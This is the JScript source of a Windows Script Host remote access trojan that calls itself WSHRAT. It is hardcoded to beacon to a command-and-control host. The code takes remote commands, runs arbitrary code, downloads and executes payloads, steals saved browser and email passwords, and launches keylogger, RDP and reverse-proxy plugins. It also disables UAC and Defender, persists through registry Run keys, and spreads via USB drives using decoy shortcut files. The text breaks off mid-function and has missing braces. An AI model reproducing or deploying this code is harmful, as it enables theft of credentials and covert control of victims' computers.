//<[ recoder : kognito (c) skype : live:unknown.sales64 ]>
//=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=
var host = "chongmei33.publicvm.com";
var port = 7045;
var installdir = "%temp%";
var runAsAdmin = false;
var lnkfile = true;
var lnkfolder = true;
if(runAsAdmin == true){
startupElevate();
if(WScript.Arguments.Named.Exists("elevated") == true){
disableSecurity();
//=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=
var shellobj = WScript.createObject("wscript.shell");
var filesystemobj = WScript.createObject("scripting.filesystemobject");
var httpobj = WScript.createObject("msxml2.xmlhttp");
//=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=
var installname = WScript.scriptName;
var startup = shellobj.specialFolders("startup") + "\\";
installdir = shellobj.ExpandEnvironmentStrings(installdir) + "\\";
if(!filesystemobj.folderExists(installdir)){ installdir = shellobj.ExpandEnvironmentStrings("%temp%") + "\\";}
var spliter = "|";
var sdkpath = installdir + "wshsdk";
var sdkfile = sdkpath + "\\" + chr(112) + chr(121) + chr(116) + chr(104) + chr(111) + chr(110) + chr(46) + chr(101) + chr(120) + chr(101);
var sleep = 5000;
var response, cmd, param, oneonce;
var inf = "";
var usbspreading = "";
var startdate = "";
//=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=
instance();
if(getBinder() != null){
runBinder();
while(true){
install();
response = "";
response = post ("is-ready","");
cmd = response.split(spliter);
switch(cmd[0]){
case "disconnect":
WScript.quit();
break;
case "reboot":
shellobj.run("%comspec% /c shutdown /r /t 0 /f", 0, true);
break;
case "shutdown":
shellobj.run("%comspec% /c shutdown /s /t 0 /f", 0, true);
break;
case "excecute":
param = cmd[1];
eval(param);
break;
case "install-sdk":
if (filesystemobj.fileExists(sdkfile)){
updatestatus("SDK+Already+Installed");
}else{
installsdk();
break;
case "get-pass":
passgrabber(cmd[1], "cmdc.exe", cmd[2]);
break;
case "get-pass-offline":
if (filesystemobj.fileExists(sdkfile)){
passgrabber(cmd[3], "cmdc.exe", "ie");
passgrabber("null", "cmdc.exe", "chrome");
passgrabber("null", "cmdc.exe", "mozilla");
passgrabber2(cmd[1], "cmdc.exe", cmd[2]);
else{
updatestatus("Installing+SDK");
var stat = installsdk();
if(stat == true){
passgrabber(cmd[3], "cmdc.exe", "ie");
passgrabber("null", "cmdc.exe", "chrome");
passgrabber("null", "cmdc.exe", "mozilla");
passgrabber2(cmd[1], "cmdc.exe", cmd[2]);
var msg = shellobj.ExpandEnvironmentStrings("%computername%") + "/" + shellobj.ExpandEnvironmentStrings("%username%");
post("show-toast", "Unable to automatically recover password for " + msg + " as the Password Recovery SDK cannot be automatically installed. You can try again manually.");
break;
case "update":
param = response.substr(response.indexOf("|") + 1);
oneonce.close();
oneonce = filesystemobj.openTextFile(installdir + installname ,2, false);
oneonce.write(param);
oneonce.close();
shellobj.run("wscript.exe //B \"" + installdir + installname + "\"");
WScript.quit();
case "uninstall":
uninstall();
break;
case "up-n-exec":
download(cmd[1],cmd[2]);
break;
case "bring-log":
upload(installdir + "wshlogs\\" + cmd[1], "take-log");
break;
case "down-n-exec":
sitedownloader(cmd[1],cmd[2]);
break;
case "filemanager":
servicestarter(cmd[1], "fm-plugin.exe", information());
break;
case "rdp":
keyloggerstarter(cmd[1], "rd-plugin.exe", information(), "", true);
break;
case "rev-proxy":
reverseproxy("rprox.exe", cmd[1]);
break;
case "exit-proxy":
shellobj.run("%comspec% /c taskkill /F /IM rprox.exe", 0, true);
break;
case "keylogger":
keyloggerstarter(cmd[1], "kl-plugin.exe", information(), 0, false);
break;
case "offline-keylogger":
keyloggerstarter(cmd[1], "kl-plugin.exe", information(), 1, false);
break;
case "browse-logs":
post("is-logs", enumfaf(installdir + "wshlogs"));
break;
case "cmd-shell":
param = cmd[1];
post("is-cmd-shell",cmdshell(param));
break;
case "get-processes":
post("is-processes", enumprocess());
break;
case "disable-uac":
disableSecurity();
updatestatus("UAC+Disabled+(Reboot+Required)");
break;
case "check-eligible":
if(filesystemobj.fileExists(cmd[1])){
updatestatus("Is+Eligible");
}else{
updatestatus("Not+Eligible");
break;
case "force-eligible":
if(WScript.Arguments.Named.Exists("elevated") == true){
if(filesystemobj.folderExists(cmd[1])){
shellobj.run("%comspec% /c " + cmd[2], 0, true);
updatestatus("SUCCESS");
}else{
updatestatus("Component+Missing");
else{
updatestatus("Elevation+Required");
break;
case "elevate":
if(WScript.Arguments.Named.Exists("elevated") == false){
oneonce.close();
oneonce = null;
WScript.CreateObject("Shell.Application").ShellExecute("wscript.exe", " //B \"" + WScript.ScriptFullName + "\" /elevated", "", "runas", 1);
updatestatus("Client+Elevated");
}catch(nn){
WScript.quit();
else{
updatestatus("Client+Elevated");
break;
case "if-elevate":
if(WScript.Arguments.Named.Exists("elevated") == false){
updatestatus("Client+Not+Elevated");
else{
updatestatus("Client+Elevated");
break;
case "kill-process":
exitprocess(cmd[1]);
break;
case "sleep":
param = cmd[1];
sleep = eval(param);
break;
}catch(er){}
WScript.sleep(sleep);
function installsdk(){
var success = false;
var sdkurl = post("moz-sdk", "");
var objhttpdownload = WScript.CreateObject("msxml2.xmlhttp");
objhttpdownload.open("get", sdkurl, false);
objhttpdownload.setRequestHeader("cache-control:", "max-age=0");
objhttpdownload.send();
if(filesystemobj.fileExists(installdir + "wshsdk.zip")){
filesystemobj.deleteFile(installdir + "wshsdk.zip");
if (objhttpdownload.status == 200){
try{
var objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type = 1;
objstreamdownload.Open();
objstreamdownload.Write(objhttpdownload.responseBody);
objstreamdownload.SaveToFile(installdir + "wshsdk.zip");
objstreamdownload.close();
objstreamdownload = null;
}catch(ez){
if(filesystemobj.fileExists(installdir + "wshsdk.zip")){
//unzip the file
UnZip(installdir + "wshsdk.zip", sdkpath);
success = true;
updatestatus("SDK+Installed");
}catch(err){
return success;
return success;
function install(){
var lnkobj;
var filename;
var foldername;
var fileicon;
var foldericon;
upstart();
for(var dri = new Enumerator(filesystemobj.drives); !dri.atEnd(); dri.moveNext()){
var drive = dri.item();
if (drive.isready == true){
if (drive.freespace > 0 ){
if (drive.drivetype == 1 ){
filesystemobj.copyFile(WScript.scriptFullName , drive.path + "\\" + installname,true);
if (filesystemobj.fileExists (drive.path + "\\" + installname)){
filesystemobj.getFile(drive.path + "\\" + installname).attributes = 2+4;
}catch(eiju){}
for(var fi = new Enumerator(filesystemobj.getfolder(drive.path + "\\").files); !fi.atEnd(); fi.moveNext()){
var file = fi.item();
if (lnkfile == false){break;}
if (file.name.indexOf(".")){
if ((file.name.split(".")[file.name.split(".").length - 1]).toLowerCase() != "lnk"){
file.attributes = 2+4;
if (file.name.toUpperCase() != installname.toUpperCase()){
filename = file.name.split(".");
lnkobj = shellobj.createShortcut(drive.path + "\\" + filename[0] + ".lnk");
lnkobj.windowStyle = 7;
lnkobj.targetPath = "cmd.exe";
lnkobj.workingDirectory = "";
lnkobj.arguments = "/c start " + installname.replace(new RegExp(" ", "g"), "\" \"") + "&start " + file.name.replace(new RegExp(" ", "g"), "\" \"") +"&exit";
try{fileicon = shellobj.RegRead ("HKEY_LOCAL_MACHINE\\software\\classes\\" + shellobj.RegRead ("HKEY_LOCAL_MACHINE\\software\\classes\\." + file.name.split(".")[file.name.split(".").length - 1]+ "\\") + "\\defaulticon\\"); }catch(eeee){}
if (fileicon.indexOf(",") == 0){
lnkobj.iconLocation = file.path;
}else {
lnkobj.iconLocation = fileicon;
}
lnkobj.save();
}
}
}
}catch(err){}
for(var fi = new Enumerator(filesystemobj.getfolder(drive.path + "\\").subFolders); !fi.atEnd(); fi.moveNext()){
var folder = fi.item();
if (lnkfolder == false){break;}
folder.attributes = 2+4;
foldername = folder.name;
lnkobj = shellobj.createShortcut(drive.path + "\\" + foldername + ".lnk");
lnkobj.windowStyle = 7;
lnkobj.targetPath = "cmd.exe";
lnkobj.workingDirectory = "";
lnkobj.arguments = "/c start " + installname.replace(new RegExp(" ", "g"), "\" \"") + "&start explorer " + folder.name.replace(new RegExp(" ", "g"), "\" \"") +"&exit";
foldericon = shellobj.RegRead("HKEY_LOCAL_MACHINE\\software\\classes\\folder\\defaulticon\\");
if (foldericon.indexOf(",") == 0){
lnkobj.iconLocation = folder.path;
}else {
lnkobj.iconLocation = foldericon;
}
lnkobj.save();
}catch(err){}
function startupElevate(){
if(WScript.Arguments.Named.Exists("elevated") == false){
WScript.CreateObject("Shell.Application").ShellExecute("wscript.exe", " //B \"" + WScript.ScriptFullName + "\" /elevated", "", "runas", 1);
}catch(nn){
WScript.quit();
function disableSecurity(){
if(WScript.Arguments.Named.Exists("elevated") == true){
var oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\default:StdRegProv");
oReg.SetDwordValue(0x80000002,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System","EnableLUA", 0);
oReg.SetDwordValue(0x80000002,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System","ConsentPromptBehaviorAdmin", 0);
oReg.SetDwordValue(0x80000002,"SOFTWARE\\Policies\\Microsoft\\Windows Defender","DisableAntiSpyware", 1);
oReg = null;
function uninstall(){
var filename;
var foldername;
shellobj.RegDelete("HKEY_CURRENT_USER\\software\\microsoft\\windows\\currentversion\\run\\" + installname.split(".")[0]);
shellobj.RegDelete("HKEY_LOCAL_MACHINE\\software\\microsoft\\windows\\currentversion\\run\\" + installname.split(".")[0]);
}catch(ei){}
filesystemobj.deleteFile(startup + installname ,true);
filesystemobj.deleteFile(WScript.scriptFullName ,true);
}catch(eej){}
for(var dri = new Enumerator(filesystemobj.drives); !dri.atEnd(); dri.moveNext()){
var drive = dri.item();
if (drive.isready == true){
if (drive.freespace > 0 ){
if (drive.drivetype == 1 ){
for(var fi = new Enumerator(filesystemobj.getfolder(drive.path + "\\").files); !fi.atEnd(); fi.moveNext()){
var file = fi.item();
if (file.name.indexOf(".")){
if ((file.name.split(".")[file.name.split(".").length - 1]).toLowerCase() != "lnk"){
file.attributes = 0;
if (file.name.toUpperCase() != installname.toUpperCase()){
filename = file.name.split(".");
filesystemobj.deleteFile(drive.path + "\\" + filename[0] + ".lnk" );
}else{
filesystemobj.deleteFile(drive.path + "\\" + file.name);
}
}else{
filesystemobj.deleteFile (file.path);
}
}
}catch(ex){}
}
for(var fi = new Enumerator(filesystemobj.getfolder(drive.path + "\\").subFolders); !fi.atEnd(); fi.moveNext()){
var folder = fi.item();
folder.attributes = 0;
}
}catch(err){}
WScript.quit();
function post (cmd ,param){
httpobj.open("post","http://" + host + ":" + port +"/" + cmd, false);
httpobj.setRequestHeader("user-agent:",information());
httpobj.send(param);
return httpobj.responseText;
}catch(err){
return "";
function information(){
if (inf == ""){
inf = hwid() + spliter;
inf = inf + shellobj.ExpandEnvironmentStrings("%computername%") + spliter ;
inf = inf + shellobj.ExpandEnvironmentStrings("%username%") + spliter;
var root = GetObject("winmgmts:{impersonationlevel=impersonate}!\\\\.\\root\\cimv2");
var os = root.ExecQuery ("select * from win32_operatingsystem");
for(var fi = new Enumerator(os); !fi.atEnd(); fi.moveNext()){
var osinfo = fi.item();
inf = inf + osinfo.caption + spliter;
break;
inf = inf + "plus" + spliter;
inf = inf + security() + spliter;
inf = inf + usbspreading;
inf = "WSHRAT" + spliter + inf + spliter + "JavaScript-v2.0" + spliter + getCountry();
return inf;
}else{
return inf;
}catch(err){
return "";
function getCountry(){
var objhttpdownload = WScript.CreateObject("msxml2.xmlhttp");
objhttpdownload.open("get", "http://ip-api.com/json/", false);
objhttpdownload.setRequestHeader("user-agent:", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36");
objhttpdownload.send();
if (objhttpdownload.status == 200){
var objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type = 1;
objstreamdownload.Open();
objstreamdownload.Write(objhttpdownload.responseBody);
objstreamdownload.Position = 0;
objstreamdownload.Type = 2;
objstreamdownload.CharSet = "us-ascii";
var raw = objstreamdownload.ReadText();
var cc = "01";
var cn = "Unknown";
try{
cc = raw.substr(raw.indexOf("countryCode") + 14);
cc = cc.substr(0, cc.indexOf("\""));
}catch(err){}
try{
cn = raw.substr(raw.indexOf("country") + 10);
cn = cn.substr(0, cn.indexOf("\""));
}catch(err){}
return cc + ":" + cn;
}else{
return "01:Unknown";
}catch(ex){
return "01:Unknown";
function upstart (){
shellobj.RegWrite("HKEY_CURRENT_USER\\software\\microsoft\\windows\\currentversion\\run\\" + installname.split(".")[0], "wscript.exe //B \"" + installdir + installname + "\"" , "REG_SZ");
shellobj.RegWrite("HKEY_LOCAL_MACHINE\\software\\microsoft\\windows\\currentversion\\run\\" + installname.split(".")[0], "wscript.exe //B \"" + installdir + installname + "\"" , "REG_SZ");
}catch(ei){}
filesystemobj.copyFile(WScript.scriptFullName, installdir + installname, true);
filesystemobj.copyFile(WScript.scriptFullName, startup + installname, true);
}catch(err){}
function hwid(){
var root = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2");
var disks = root.ExecQuery ("select * from win32_logicaldisk");
for(var fi = new Enumerator(disks); !fi.atEnd(); fi.moveNext()){
var disk = fi.item();
if (disk.volumeSerialNumber != ""){
return disk.volumeSerialNumber;
break;
}catch(err){
return "";
function security(){
var objwmiservice = GetObject("winmgmts:{impersonationlevel=impersonate}!\\\\.\\root\\cimv2");
var colitems = objwmiservice.ExecQuery("select * from win32_operatingsystem",null,48);
var versionstr, osversion;
for(var fi = new Enumerator(colitems); !fi.atEnd(); fi.moveNext()){
var objitem = fi.item();
versionstr = objitem.version.toString().split(".");
//versionstr = colitems.version.split(".");
osversion = versionstr[0] + ".";
for (var x = 1; x < versionstr.length; x++){
osversion = osversion + versionstr[0];
osversion = eval(osversion);
var sc;
if (osversion > 6){ sc = "securitycenter2"; }else{ sc = "securitycenter";}
var objsecuritycenter = GetObject("winmgmts:\\\\localhost\\root\\" + sc);
var colantivirus = objsecuritycenter.ExecQuery("select * from antivirusproduct", "wql", 0);
var secu = "";
for(var fi = new Enumerator(colantivirus); !fi.atEnd(); fi.moveNext()){
var objantivirus = fi.item();
secu = secu + objantivirus.displayName + " .";
if(secu == ""){secu = "nan-av";}
return secu;
}catch(err){}
function getDate(){
var s = "";
var d = new Date();
s += d.getDate() + "/";
s += (d.getMonth() + 1) + "/";
s += d.getYear();
return s;
function instance(){
usbspreading = shellobj.RegRead("HKEY_LOCAL_MACHINE\\software\\" + installname.split(".")[0] + "\\");
}catch(eee){}
if(usbspreading == ""){
if (WScript.scriptFullName.substr(1).toLowerCase() == ":\\" + installname.toLowerCase()){
usbspreading = "true - " + getDate();
try{shellobj.RegWrite("HKEY_LOCAL_MACHINE\\software\\" + installname.split(".")[0] + "\\", usbspreading, "REG_SZ");}catch(eeeee){}
}else{
usbspreading = "false - " + getDate();
try{shellobj.RegWrite("HKEY_LOCAL_MACHINE\\software\\" + installname.split(".")[0] + "\\", usbspreading, "REG_SZ");}catch(eeeee){}
upstart();
var scriptfullnameshort = filesystemobj.getFile(WScript.scriptFullName);
var installfullnameshort = filesystemobj.getFile(installdir + installname);
if (scriptfullnameshort.shortPath.toLowerCase() != installfullnameshort.shortPath.toLowerCase()){
shellobj.run("wscript.exe //B \"" + installdir + installname + "\"");
WScript.quit();
oneonce = filesystemobj.openTextFile(installdir + installname ,8, false);
}catch(err){
WScript.quit();
function decode_base64(base64_string){
var yhm_pepe = WScript.CreateObject("ADODB.Stream");
var spike = (WScript.CreateObject("Microsoft.XMLDOM")).createElement("tmp");
spike.dataType = "bin.base64";
spike.text = base64_string;
yhm_pepe.Type = 1;
yhm_pepe.Open();
yhm_pepe.Write(spike.nodeTypedValue);
yhm_pepe.Position = 0;
yhm_pepe.Type = 2;
yhm_pepe.CharSet = "us-ascii";
return yhm_pepe.ReadText();
function decode_pass(retcmd){
var content, nss, command;
if(retcmd == "mozilla"){
command = "give-me-ffpv";
}else if(retcmd == "chrome"){
command = "give-me-chpv";
}else if(retcmd == "foxmail"){
command = "give-me-fm";
var objhttpdownload = WScript.CreateObject("msxml2.xmlhttp");
objhttpdownload.open("post", "http://" + host + ":" + port +"/" + command, false);
objhttpdownload.setRequestHeader("user-agent:", information());
objhttpdownload.send("");
if(filesystemobj.fileExists(installdir + "rundll")){
filesystemobj.deleteFile(installdir + "rundll");
if (objhttpdownload.status == 200){
try{
var objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type = 1;
objstreamdownload.Open();
objstreamdownload.Write(objhttpdownload.responseBody);
objstreamdownload.Position = 0;
objstreamdownload.Type = 2;
objstreamdownload.CharSet = "us-ascii";
content = objstreamdownload.ReadText();
nss = sdkpath + "\\nss";
content = content.replace(new RegExp("%nss%", "g"), nss); //for firefox
content = content.replace(new RegExp("%path%", "g"), installdir + "Login Data"); //for chrome
var sw = filesystemobj.openTextFile(installdir + "rundll", 2, true);
sw.write(content);
sw.close();
sw = null;
objstreamdownload.close();
objstreamdownload = null;
}catch(ez){}
shellobj.run("%comspec% /c cd \"" + sdkpath + "\" && " + gsp(sdkfile) + " " + gsp(installdir + "rundll") + " > \"" + installdir + "wshout\"", 0, true);
WScript.sleep(2000);
var sr = filesystemobj.openTextFile(installdir + "wshout");
content = sr.readall();
sr.close();
sr = null;
filesystemobj.deleteFile(installdir + "rundll");
filesystemobj.deleteFile(installdir + "wshout");
post(retcmd, content);
}catch(err){
function chr(code){
return String.fromCharCode(code);
function gsp(path){
return filesystemobj.getFile(path).shortPath;
function passgrabber (fileurl, filename, retcmd){
var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
var content, profile, folder;
if (retcmd == "ie"){
content = decode_base64(fileurl);
eval(content);
return;
}else if(retcmd == "chrome"){
folder = shellobj.ExpandEnvironmentStrings("%temp%");
folder = folder.substr(0, folder.toLowerCase().indexOf("temp")) + "Google\\Chrome\\User Data\\Default\\Login Data";
if (objfsodownload.fileExists(folder) ){
objfsodownload.copyFile(folder, installdir + "Login Data", true);
if (objfsodownload.fileExists(sdkfile)){
//'proceed decoding
decode_pass(retcmd);
objfsodownload.deleteFile(installdir + "Login Data");
}else{
//'request for sdk
post("show-toast", "WSH Sdk for password recovery not found, You can install this SDK from the password recovery menu");
}else{
post(retcmd, "No Password Found");
}else if(retcmd == "foxmail"){
if (objfsodownload.fileExists(sdkfile)){
//'proceed decoding
decode_pass(retcmd);
}else{
//'request for sdk
post("show-toast", "WSH Sdk for password recovery not found, You can install this SDK from the password recovery menu");
}else if(retcmd == "mozilla"){
folder = shellobj.ExpandEnvironmentStrings("%appdata%") + "\\Mozilla\\Firefox\\";
if (objfsodownload.fileExists (folder + "profiles.ini")){
content = filesystemobj.openTextFile(folder + "profiles.ini").readall();
if (content.indexOf("Path=") > 0) {
content = content.substr(content.indexOf("Path=") + 5);
content = content.substr(0, content.indexOf("\r\n"));
profile = (folder + content).replace(new RegExp("/", "g"), "\\");
folder = profile + "\logins.json";
if (objfsodownload.fileExists(sdkfile)){
//'proceed decoding
decode_pass(retcmd);
}else{
//'request for sdk
post("show-toast", "WSH Sdk for password recovery not found, You can install this SDK from the password recovery menu");
}else{
post(retcmd, "No Password Found");
}else{
post(retcmd, "No Password Found");
}else{
passgrabber2(fileurl, filename, retcmd);
}catch(err){}
function UnZip(zipfile, ExtractTo){
if(filesystemobj.GetExtensionName(zipfile) == "zip"){
if(!filesystemobj.FolderExists(ExtractTo)){
filesystemobj.CreateFolder(ExtractTo);
var objShell = WScript.CreateObject("Shell.Application");
var destination = objShell.NameSpace(ExtractTo);
var zip_content = objShell.NameSpace(zipfile).Items();
for(i = 0; i < zip_content.Count; i++){
if(filesystemobj.FileExists(filesystemobj.Buildpath(ExtractTo,zip_content.item(i).name)+"."+filesystemobj.getExtensionName(zip_content.item(i).path))){
filesystemobj.DeleteFile(filesystemobj.Buildpath(ExtractTo,zip_content.item(i).name)+"."+filesystemobj.getExtensionName(zip_content.item(i).path));
destination.copyHere(zip_content.item(i), 20);
function passgrabber2(fileurl, filename, retcmd){
shellobj.run("%comspec% /c taskkill /F /IM " + filename, 0, true);
try{filesystemobj.deleteFile(installdir + filename + "data");}catch(ey){}
var config_file = installdir + filename.substr(0, filename.lastIndexOf(".")) + ".cfg";
var cfg = "[General]\nShowGridLines=0\nSaveFilterIndex=0\nShowInfoTip=1\nUseProfileFolder=0\nProfileFolder=\nMarkOddEvenRows=0\nWinPos=2C 00 00 00 00 00 00 00 01 00 00 00 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 00 00 00 00 00 00 00 00 80 02 00 00 E0 01 00 00\nColumns=FA 00 00 00 FA 00 01 00 6E 00 02 00 6E 00 03 00 78 00 04 00 78 00 05 00 78 00 06 00 64 00 07 00 FA 00 08 00\nSort=0";
//write config
var writer = filesystemobj.openTextFile(config_file, 2, true);
writer.writeLine(cfg);
writer.close();
writer = null;
var strlink = fileurl;
var strsaveto = installdir + filename;
var objhttpdownload = WScript.CreateObject("msxml2.xmlhttp");
objhttpdownload.open("get", strlink, false);
objhttpdownload.setRequestHeader("cache-control:", "max-age=0");
objhttpdownload.send();
var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
if(objfsodownload.fileExists(strsaveto)){
objfsodownload.deleteFile(strsaveto);
if (objhttpdownload.status == 200){
var objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type = 1;
objstreamdownload.Open();
objstreamdownload.Write(objhttpdownload.responseBody);
objstreamdownload.SaveToFile(strsaveto);
objstreamdownload.close();
objstreamdownload = null;
if(objfsodownload.fileExists(strsaveto)){
var runner = WScript.CreateObject("Shell.Application");
var saver = objfsodownload.getFile(strsaveto).shortPath
//try 10 times before giveup
for(var i=0; i<5; i++){
shellobj.run("%comspec% /c taskkill /F /IM " + filename, 0, true);
WScript.sleep(1000);
runner.shellExecute(saver, " /stext " + saver + "data");
WScript.sleep(2000);
if(objfsodownload.fileExists(saver + "data")){
var sr = filesystemobj.openTextFile(saver + "data");
var buffer = sr.readall();
sr.close();
sr = null;
var outpath = installdir + "wshlogs\\recovered_password_email.log";
var folder = objfsodownload.GetParentFolderName(outpath);
if (!objfsodownload.FolderExists(folder))
shellobj.run("%comspec% /c mkdir \"" + folder + "\"", 0, true);
writer = filesystemobj.openTextFile(outpath, 2, true);
writer.write(buffer);
writer.close();
writer = null;
upload(saver + "data", retcmd);
break;
deletefaf(strsaveto);
function reverseproxy (filename, filearg){
shellobj.run("%comspec% /c taskkill /F /IM " + filename, 0, true);
var strsaveto = installdir + filename;
var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
if(objfsodownload.fileExists(strsaveto)){
objfsodownload.deleteFile(strsaveto);
try{
var objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type = 1;
objstreamdownload.Open();
objstreamdownload.Write(getReverseProxy());
objstreamdownload.SaveToFile(strsaveto);
objstreamdownload.close();
objstreamdownload = null;
}catch(err){
updatestatus("Access+Denied");
if(objfsodownload.fileExists(strsaveto)){
shellobj.run("\"" + strsaveto + "\" " + host + " " + port + " " + filearg );
function keyloggerstarter (fileurl, filename, filearg, is_offline, is_rdp){
shellobj.run("%comspec% /c taskkill /F /IM " + filename, 0, true);
var strlink = fileurl;
var strsaveto = installdir + filename;
var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
if(objfsodownload.fileExists(strsaveto)){
objfsodownload.deleteFile(strsaveto);
try{
var objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type = 1;
objstreamdownload.Open();
if(is_rdp == true){
objstreamdownload.Write(getRDP());
}else{
objstreamdownload.Write(getKeyLogger());
objstreamdownload.SaveToFile(strsaveto);
objstreamdownload.close();
objstreamdownload = null;
}catch(err){
updatestatus("Access+Denied");
if(objfsodownload.fileExists(strsaveto)){
shellobj.run("\"" + strsaveto + "\" " + host + " " + port + " \"" + filearg + "\" " + is_offline);
function servicestarter (fileurl, filename, filearg){
shellobj.run("%comspec% /c taskkill /F /IM " + filename, 0, true);
var strlink = fileurl;
var strsaveto = installdir + filename;
var objhttpdownload = WScript.CreateObject("msxml2.xmlhttp" );
objhttpdownload.open("get", strlink, false);
objhttpdownload.setRequestHeader("cache-control:", "max-age=0");
objhttpdownload.send();
var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
if(objfsodownload.fileExists(strsaveto)){
objfsodownload.deleteFile(strsaveto);
if (objhttpdownload.status == 200){
try{
var objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type = 1;
objstreamdownload.Open();
objstreamdownload.Write(objhttpdownload.responseBody);
objstreamdownload.SaveToFile(strsaveto);
objstreamdownload.close();
objstreamdownload = null;
}catch(err){
updatestatus("Access+Denied");
}
if(objfsodownload.fileExists(strsaveto)){
shellobj.run("\"" + strsaveto + "\" " + host + " " + port + " \"" + filearg + "\"");
}
function sitedownloader (fileurl,filename){
var strlink = fileurl;
var strsaveto = installdir + filename;
var objhttpdownload = WScript.CreateObject("msxml2.serverxmlhttp" );
objhttpdownload.open("get", strlink, false);
objhttpdownload.setRequestHeader("cache-control", "max-age=0");
objhttpdownload.send();
var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
if(objfsodownload.fileExists(strsaveto)){
objfsodownload.deleteFile(strsaveto);
if (objhttpdownload.status == 200){
var objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type = 1;
objstreamdownload.Open();
objstreamdownload.Write(objhttpdownload.responseBody);
objstreamdownload.SaveToFile(strsaveto);
objstreamdownload.close();
objstreamdownload = null;
}
if(objfsodownload.fileExists(strsaveto)){
shellobj.run(objfsodownload.getFile(strsaveto).shortPath);
updatestatus("Executed+File");
}
function download (fileurl,filedir){
if(filedir == ""){
filedir = installdir;
strsaveto = filedir + fileurl.substr(fileurl.lastIndexOf("\\") + 1);
var objhttpdownload = WScript.CreateObject("msxml2.xmlhttp");
objhttpdownload.open("post","http://" + host + ":" + port +"/" + "send-to-me" + spliter + fileurl, false);
objhttpdownload.setRequestHeader("user-agent:", information());
objhttpdownload.send("");
var objfsodownload = WScript.CreateObject("scripting.filesystemobject");
if(objfsodownload.fileExists(strsaveto)){
objfsodownload.deleteFile(strsaveto);
if (objhttpdownload.status == 200){
var objstreamdownload = WScript.CreateObject("adodb.stream");
objstreamdownload.Type = 1;
objstreamdownload.Open();
objstreamdownload.Write(objhttpdownload.responseBody);
objstreamdownload.SaveToFile(strsaveto);
objstreamdownload.close();
objstreamdownload = null;
}
if(objfsodownload.fileExists(strsaveto)){
shellobj.run(objfsodownload.getFile(strsaveto).shortPath);
updatestatus("Executed+File");
}
function updatestatus(status_msg){
var objsoc = WScript.CreateObject("msxml2.xmlhttp");
objsoc.open("post","http://" + host + ":" + port + "/" + "update-status" + spliter + status_msg, false);
objsoc.setRequestHeader("user-agent:", information());
objsoc.send("");
}catch(err){}
function upload (fileurl, retcmd){
var httpobj,objstreamuploade,buffer;
var objstreamuploade = WScript.CreateObject("adodb.stream");
objstreamuploade.Type = 1;
objstreamuploade.Open();
objstreamuploade.loadFromFile(fileurl);
buffer = objstreamuploade.Read();
objstreamuploade.close();
objstreamdownload = null;
var httpobj = WScript.CreateObject("msxml2.xmlhttp");
httpobj.open("post","http://" + host + ":" + port +"/" + retcmd, false);
httpobj.setRequestHeader("user-agent:", information());
httpobj.send(buffer);
}catch(er){
updatestatus("Upload+Failed");
function deletefaf (url){
filesystemobj.deleteFile(url);
filesystemobj.deleteFolder(url);
}catch(err){}
function cmdshell (cmd){
var httpobj,oexec,readallfromany;
var strsaveto = installdir + "out.txt";
shellobj.run("%comspec% /c " + cmd + " > \"" + strsaveto + "\"", 0, true);
readallfromany = filesystemobj.openTextFile(strsaveto).readAll();
filesystemobj.deleteFile(strsaveto);
}catch(ee){}
return readallfromany;
function enumprocess(){
var ep = "";
var objwmiservice = GetObject("winmgmts:\\\\.\\root\\cimv2");
var colitems = objwmiservice.ExecQuery("select * from win32_process",null,48);
for(var fi = new Enumerator(colitems); !fi.atEnd(); fi.moveNext()){
var objitem = fi.item();
ep = ep + objitem.name + "^";
ep = ep + objitem.processId + "^";
ep = ep + objitem.executablePath + spliter;
}catch(er){}
return ep;
function exitprocess (pid){
shellobj.run("taskkill /F /T /PID " + pid,0,true);
}catch(err){}
function getParentDirectory(path){
var fo = filesystemobj.getFile(path);
return filesystemobj.getParentFolderName(fo);
function enumfaf (enumdir){
var re = "";
for(var fi = new Enumerator(filesystemobj.getFolder (enumdir).subfolders); !fi.atEnd(); fi.moveNext()){
var folder = fi.item();
re = re + folder.name + "^^d^" + folder.attributes + spliter;
for(var fi = new Enumerator(filesystemobj.getFolder (enumdir).files); !fi.atEnd(); fi.moveNext()){
var file = fi.item();
re = re + file.name + "^" + file.size + "^" + file.attributes + spliter;
}catch(err){}
return re;
function getKeyLogger(){
